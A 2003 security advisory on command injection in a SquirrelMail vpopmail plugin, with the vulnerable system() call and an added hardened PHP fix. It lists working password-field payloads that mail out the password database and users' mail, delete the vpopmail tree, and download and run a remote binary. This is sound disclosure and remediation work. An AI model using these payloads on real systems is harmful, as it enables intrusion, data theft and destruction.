VPOPMail Account Administration (squirrel mail) version 0.9.7

2003-03-13T00:00:00
ID SECURITYVULNS:DOC:4200
Type securityvulns
Reporter Securityvulns
Modified 2003-03-13T00:00:00

Description

Plugin info: http://www.squirrelmail.org/plugin_view.php?id=103

Description:

VPOPMail Account Administration: The plugin lets the user do the tasks he would be able to do using qmailadmin:

- change password
- let mails forward
- create away messages

Notes (from the README):

*** IMPORTANT *** For the plugin to work correctly, the Web-Server needs to run as the same user as vpopmail does (most common: user vpopmail). This is because the plugin needs write permissions to the user's Maildir to:
- create appropriate .qmail-files
- create away-messages

Comments (from myself):

This (allowing anything to be executed as the web user) is of course a huge security hole. This actually goes beyond that and says to run the web server as vpopmail!

Amazing! These people are far too trusting of their users.

Bad idea.

What could be worse?

How about making it even easier to exploit every vpopmail binary?

How?

Unclean input parsing!

If the vpopmail user is the same as the web user you get to have fun with:

vaddaliasdomain vconvert vdominfo vpasswd vadddomain vdeldomain vipmap vpopbull vadduser vdelivermail vkill vqmaillocal valias vdeloldusers vmkpasswd vsetuserquota vchkpw vdeluser vmoduser vuserinfo

Basically the exploits are unlimited (as you get full access rights to vpopmail):

change password

password;~vpopmail/bin/vpasswd user@host password

mail password database

password;cat ~vpopmail/domains/example.com/vpasswd|mail -s owned user@host

remove vpopmail

password;rm -rf ~vpopmail/

get listings of mail

password;ls ~vpopmail/domains/example.com/user/Maildir/new| mail user@host

read any user's mail

passwd;cat ~vpopmail/domains/example.com/user/Maildir/new//1027359339.48628.example.com\,S\=2432 | mail user@host

execute other arbitrary code on the server

passwd; wget example.com/exploit -O /tmp/f;chmod +x /tmp/f;/tmp/f;

Here is the offending code (line 45 in vpopmail.php):

system("$vpasswd $username $pwd");

As we can see, this is very bad.

A very bad security model (running your web server as vpopmail) backed up by sloppy coding (passing user-entered data into the shell unescaped) == bad bad bad.
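For comparison, here is the offending line next to a hardened replacement. This is an added example, not the plugin's own code: $vpasswd, $username and $pwd are the names from vpopmail.php, while the function names, the username pattern, the length limits and the argv-array form of proc_open() (PHP 7.4 or later) are assumptions.

```php
<?php
// Added example, not the plugin's code. Names $vpasswd, $username and $pwd come
// from vpopmail.php; the function names, pattern and limits are assumptions.

// Unsafe (as in the plugin): the string is handed to /bin/sh, so a password of
// "password;rm -rf ~vpopmail/" runs the second command as the web server's user.
function change_password_unsafe(string $vpasswd, string $username, string $pwd): int
{
    system("$vpasswd $username $pwd", $rc);
    return $rc;
}

// Hardened: allow-list the username, bound the password, and start the binary
// with an argv array so no shell ever parses the user-supplied data.
function change_password(string $vpasswd, string $username, string $pwd): int
{
    // vpopmail accounts are local@domain; accept only a conservative character set.
    if (!preg_match('/^[A-Za-z0-9._-]{1,64}@[A-Za-z0-9.-]{1,253}$/', $username)) {
        throw new InvalidArgumentException('invalid username');
    }
    // Shell metacharacters are harmless without a shell, but control characters
    // and empty or oversized values are still rejected as a second layer.
    if ($pwd === '' || strlen($pwd) > 128 || preg_match('/[\x00-\x1f\x7f]/', $pwd)) {
        throw new InvalidArgumentException('invalid password');
    }
    $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    // Array form (PHP >= 7.4) executes $vpasswd directly; ';', '|', '`' and '$'
    // in $pwd reach vpasswd as literal bytes of a single argument.
    $proc = proc_open([$vpasswd, $username, $pwd], $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start vpasswd');
    }
    fclose($pipes[0]);
    stream_get_contents($pipes[1]);   // drain output so vpasswd cannot block
    stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    return proc_close($proc);         // vpasswd exit status, 0 on success
}
```

Two things this does not fix: the password is still visible in the process list while vpasswd runs, and the web server still runs as vpopmail, so any other bug in the plugin keeps the same full access to ~vpopmail.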

So you just pass anything I wrote above (or really anything at all that you desire) and you own the system's vpopmail config.

Enter this data into the password-changing field (make sure it matches up in both) in the SquirrelMail vpopmail password section to exploit.

But it's just a plugin to a webmail system, so no big deal ;-)

-- error <error@lostinthenoise.net>